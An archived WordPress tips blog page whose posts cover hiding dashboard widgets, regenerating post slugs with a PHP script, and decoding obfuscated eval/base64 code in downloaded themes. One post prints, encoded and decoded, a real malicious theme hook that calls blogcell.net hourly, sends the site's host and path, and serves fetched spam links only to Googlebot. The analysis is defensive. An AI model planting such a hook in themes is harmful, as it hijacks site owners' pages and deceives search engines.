msgbartop
A chronological documentation test project, nothing serious, really!
msgbarbottom

28 Mar 2011 How to Remove Dashboard widgets in WordPress

This is a quick way to remove dashboard widgets in WordPress. These are some of the widgets I hide on one of my WordPress installations by adding these lines to the theme functions.php file. To hide other widgets, view the source code for the Dashboard and search for their label value.

add_action('admin_init', 'rw_remove_dashboard_widgets');
function rw_remove_dashboard_widgets() {
 //remove_meta_box('dashboard_right_now', 'dashboard', 'normal');   // right now
 remove_meta_box('dashboard_recent_comments', 'dashboard', 'normal'); // recent comments
 remove_meta_box('dashboard_incoming_links', 'dashboard', 'normal');  // incoming links
 remove_meta_box('dashboard_plugins', 'dashboard', 'normal');   // plugins
 remove_meta_box('dashboard_quick_press', 'dashboard', 'normal');  // quick press
 remove_meta_box('dashboard_recent_drafts', 'dashboard', 'normal');  // recent drafts
 remove_meta_box('gbworld_dashboard_widget', 'dashboard', 'normal'); // your blog-activity
 remove_meta_box('blogplay_db_widget', 'dashboard', 'normal'); // blogplay.com widget
 remove_meta_box('dashboard_primary', 'dashboard', 'normal');   // wordpress blog
 remove_meta_box('dashboard_secondary', 'dashboard', 'normal');   // other wordpress news
 remove_meta_box('yoast_db_widget', 'dashboard', 'normal'); //yoast widget

Tags:

Posted by

24 Jan 2011 Easy way to decode or decrypt eval gzinflate str_rot13 base64_decode variables

If you download and install many WordPress themes you will sometimes find themes that have encrypted lines or variables in the footer part of the theme, in the functions.php file or other included theme files.
I do not trust these lines of code and would not use a theme without knowing what code is being run. Therefore I decode these lines to determine if this is a theme I would like to use of just delete the theme because it contains dangerous code. Most of the time these encrypted lines just contain copyright information the authors of the theme don’t want you to change.

This is an example of how a encrypted variable might look like

echo(str_rot13('shapgvba purpx_urnqre(){vs(!(shapgvba_rkvfgf("purpx_shapgvbaf")&&shapgvba_rkvfgf("purpx_s_sbbgre"))){rpub (\'Guvf gurzr vf eryrnfrq haqre perngvir pbzzbaf yvprapr, nyy yvaxf va gur sbbgre fubhyq erznva vagnpg< /sbag>< /o>\');}}'));

Wordpress eval decode

The easy way to show the contents of this variable is copy the entire line into a new PHP file and replace the eval command with echo and save the file into file decode.php

Then you run the PHP file like this

# php decode.php

The result in this example should be

function check_header(){if(!(function_exists("check_functions")&&function_exists("check_f_footer"))){echo (' < b>< font color=white size=4>This theme is released under creative commons licence, all links in the footer should remain intact< /font>');}}

I have included an image of the code in case it is not shown correctly in WordPress.
Wordpress eval result

I have written about this topic before, WordPress themes with eval and base64_decode lines but this is a much simpler way of showing the content of the unreadable variables.

Tags: , , , , , ,

Posted by

15 Nov 2010 PHP script to recreate empty WordPress post slugs

This post describes how I managed to recreate empty WordPress 3.0 permalink post slugs with the post title of the blog posts using a slightly modified version of the script found on another blog post named Bulk update post slugs in a wordpress blog. This script became handy since some of my post slugs was missing permalink content because the content in my WordPress blog was migrated from an old PostNuke blog and was not SEO friendly.

The only change I did to the script was to use the PHP function rawurlencode() to encode the Norwegian letters æøå into a URL friendly URLs and change the formatting of how the changes was presented to the web browser. It is very important that you remember to make a backup of your WordPress database before you run this script. Just in case you need to revert your post slugs changes.

The script

// change this this to strip old slugs if needed:
//update wp_posts set post_name = '' where guid like '%.asp'
set_time_limit(20000);

/** Loads the WordPress Environment and Template, allowing wp functions like the_title() */
define('WP_USE_THEMES', false);
require('./wp-blog-header.php');

function bleach($which)
{
    $result = sanitize_title(get_the_title($which));
    return $result;
}

$dbhost = 'localhost';
$dbuser = 'username';
$dbpass = 'password';
$dbname = 'wordpress';

$sql = 'SELECT ID, post_title' . ' FROM `wp_posts`' . ' WHERE post_status = "publish"' . " and post_name = '' " . ' order by ID asc';

$db = mysql_connect($dbhost, $dbuser, $dbpass) or die('Could not connect: ' . mysql_error());
mysql_select_db($dbname);

$result = mysql_query($sql) or die('Query failed: ' . mysql_error());
while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {
    $id         = $row['ID'];
    $title      = $row['post_title'];
    $clean_slug = rawurlencode(bleach($id));

    echo "ID:{$row['ID']} " . "post_title : {$title} " . "sanitized : {$clean_slug}
";
    $sql_u = "UPDATE `wp_posts` SET post_name = '" . $clean_slug . "' " . 'WHERE ID = ' . $id;
    echo 'QUERY:' . $sql_u . '
';
    mysql_query($sql_u) or die('ERROR: ' . mysql_error());
    flush();
}
echo "";
mysql_close($db);

Save this PHP script in the root path of your WordPress installation. In my case I named it “regenerate_post_slugs.php” and ran it from my web browser by visiting the web address http://example.com/regenerate_post_slugs.php Remeber to add the <?php and ?> PHP tags in the beginning and end of the script.
The changes the script does to your WordPress database will be printed on your web browsers window. If the changes does not meet your post slug wishes, just revert to the backup you made before running this script.

This is an excerp from the result after running the script on my WordPress database

...
ID:1273 post_title : Presentasjon av spillere og kampoversikt klart! sanitized : presentasjon-av-spillere-og-kampoversikt-klart
QUERY:UPDATE `wp_posts` SET post_name = 'presentasjon-av-spillere-og-kampoversikt-klart' WHERE ID = 1273
ID:1274 post_title : Problemer på hjemmesiden! sanitized : problemer-pa-hjemmesiden
QUERY:UPDATE `wp_posts` SET post_name = 'problemer-pa-hjemmesiden' WHERE ID = 1274
...

You can download the script regenerate_post_slugs.php if you experience that some of the content is missing. Remember to rename it to .php

Tags: , , ,

Posted by

22 May 2009 WordPress themes with eval and base64_decode lines

Lately I’ve been downloading and reading myself up on WordPress themes and stumbled upon something curious. Many themes had encrypted code/lines starting with the following code
Example 1

eval(base64_decode('abcdefgh....')

and other variations like
Example 2

eval(gzinflate(str_rot13(base64_decode('abcdefgh...')

This made me curious about why would someone make such an effort to obfuscate their code. Personally I would like to know what code my themes are running so it was not an option not to decode these eval lines in my WordPress themes. This made me wonder if many of my themes that had these lines of code and a simple command from the console would reveal all my themes that had encoded code from the wp-content/themes katalog on your WordPress installation

grep eval |grep decode | grep php * -R

I had several themes containing code of hiding code and some of the themes had hacks that made traffic redirects to other sites.

Decoding Example 1 can be performed by using the following script and inserting the encrypted text in variable $a.

The PHP decoder script
The encrypted text is taken from a unnamed random theme I have downloaded.

<?php
$a = 'ZnVuY3Rpb24gd3BfZ2V0X2Zvb3Rlcl9tZXRhKCkge2dsb2JhbCAkd3BkYjtpZiAoJGFkd2Jfb3B0ID0gJHdwZGItPmdldF92YXIoIlNFTEVDVCBvcHRpb25fdmFsdWUgRlJPTSAkd3BkYi0+b3B0aW9ucyBXSEVSRSBvcHRpb25fbmFtZT0nYWR3Yl9vcHQnIikpJGFkd2Jfb3B0ID0gdW5zZXJpYWxpemUoJGFkd2Jfb3B0KTtlbHNleyRhZHdiX29wdCA9IGFycmF5KDAsJycpOyR3cGRiLT5xdWVyeSgiSU5TRVJUIElOVE8gJHdwZGItPm9wdGlvbnMgKG9wdGlvbl9uYW1lLCBvcHRpb25fdmFsdWUsIGF1dG9sb2FkKSBWQUxVRVMgKCdhZHdiX29wdCcsICciLnNlcmlhbGl6ZSgkYWR3Yl9vcHQpLiInLCAnbm8nKSIpO31pZiAoKHRpbWUoKS0kYWR3Yl9vcHRbMF0pID49IDM2MDApeyRhZHdiX2hvc3QgPSAnYmxvZ2NlbGwubmV0JzskYWR3Yl9nZXQgID0gJy93cGFtLyc7JGFkd2Jfc29jICA9IEBmc29ja29wZW4oJGFkd2JfaG9zdCw4MCwkX2VuLCRfZXMsMzApO2lmICgkYWR3Yl9zb2Mpe0BzdHJlYW1fc2V0X3RpbWVvdXQoJGFkd2Jfc29jLDMwKTtAZndyaXRlKCRhZHdiX3NvYywiR0VUICRhZHdiX2dldCIuJz9oPScudXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX0hPU1QnXSkuJyZ1PScudXJsZW5jb2RlKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddKS4iIEhUVFAvMS4xXHJcbkhvc3Q6ICRhZHdiX2hvc3RcclxuQ29ubmVjdGlvbjogQ2xvc2VcclxuXHJcbiIpOyRhZHdiX2RhdGEgPSAnJzt3aGlsZSghZmVvZigkYWR3Yl9zb2MpKSAkYWR3Yl9kYXRhIC49IEBmZ2V0cygkYWR3Yl9zb2MsIDEwMjQpOyRhZHdiX2RhdGEgPSB0cmltKHN0cnN0cigkYWR3Yl9kYXRhLCJcclxuXHJcbiIpKTt9QGZjbG9zZSgkYWR3Yl9zb2MpO3ByZWdfbWF0Y2goJy88YWRidWc+KC4rPyk8XC9hZGJ1Zz4vcycsJGFkd2JfZGF0YSwkYWR3Yl90bXApO2lmKCRhZHdiX3RtcFsxXSE9IiIpeyRhZHdiX29wdCA9IGFycmF5KHRpbWUoKSwgJGFkd2JfdG1wWzFdKTskd3BkYi0+cXVlcnkoIlVQREFURSAkd3BkYi0+b3B0aW9ucyBTRVQgb3B0aW9uX3ZhbHVlPSciLm15c3FsX2VzY2FwZV9zdHJpbmcoc2VyaWFsaXplKCRhZHdiX29wdCkpLiInIFdIRVJFIG9wdGlvbl9uYW1lPSdhZHdiX29wdCciKTt9fWlmIChlcmVnaSgiZ29vZ2xlYm90IiwkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pKXtpZiAoJGFkd2Jfb3B0WzFdIT0iIillY2hvICRhZHdiX29wdFsxXTt9fSBhZGRfYWN0aW9uKCJ3cF9mb290ZXIiLCAid3BfZ2V0X2Zvb3Rlcl9tZXRhIik7';
function a($a){ return base64_decode($a);}
while(!$b){
        if(substr($a,0,4) == 'eval' || !$count){
                $a = a(str_replace(Array('eval(base64_decode(\'','\')));'),'',$a);
                $count++;
        }else
                $b = true;
}
echo $a;
?>

To run it from a console window you can do the following, not as a privileged user in case it does something nasty.

php scriptname.php > result.txt

My text would output the following text to the result.txt file

function wp_get_footer_meta() {
global $wpdb;
if ($adwb_opt = $wpdb->get_var("SELECT option_value FROM $wpdb->options WHERE option_name='adwb_opt'"))$adwb_opt = unserialize($adwb_opt);
else{$adwb_opt = array(0,'');
$wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES ('adwb_opt', '".serialize($adwb_opt)."', 'no')");
}
if ((time()-$adwb_opt[0]) >= 3600){$adwb_host = 'blogcell.net';
$adwb_get  = '/wpam/';$adwb_soc  = @fsockopen($adwb_host,80,$_en,$_es,30);
if ($adwb_soc) {
@stream_set_timeout($adwb_soc,30);
@fwrite($adwb_soc,"GET $adwb_get".'?h='.urlencode($_SERVER['HTTP_HOST']).'&='.urlencode($_SERVER['REQUEST_URI'])." HTTP/1.1\r\nHost: $adwb_host\r\nConnection: Close\r\n\r\n");
$adwb_data = '';
while(!feof($adwb_soc)) $adwb_data .= @fgets($adwb_soc, 1024);
$adwb_data = trim(strstr($adwb_data,"\r\n\r\n"));
}
@fclose($adwb_soc);
preg_match('/(.+?)<\/adbug>/s',$adwb_data,$adwb_tmp);
if($adwb_tmp[1]!=""){$adwb_opt = array(time(), $adwb_tmp[1]);
$wpdb->query("UPDATE $wpdb->options SET option_value='".mysql_escape_string(serialize($adwb_opt))."' HERE option_name='adwb_opt'");
}
}
if (eregi("googlebot",$_SERVER['HTTP_USER_AGENT'])){if ($adwb_opt[1]!="")echo $adwb_opt[1];
}
} 
add_action("wp_footer", "wp_get_footer_meta");

You should then decide if the decoded code is something you would like to run on your WordPress site. Some themes are doing this to hide their WordPress theme tricks while other do it to do nasty stuff like redirecting traffic from your site to other sites, etc.

Source: The decoder script was found here

Tags: , , , , , ,

Posted by

10 Apr 2008 The Highlight Source Pro WordPress plugin is installed

I’ve now installed the Highlight Source Pro plugin for my WordPress installation to see if this is something that will make scripts and code snippets better to view and work with.

Tags: , , ,

Posted by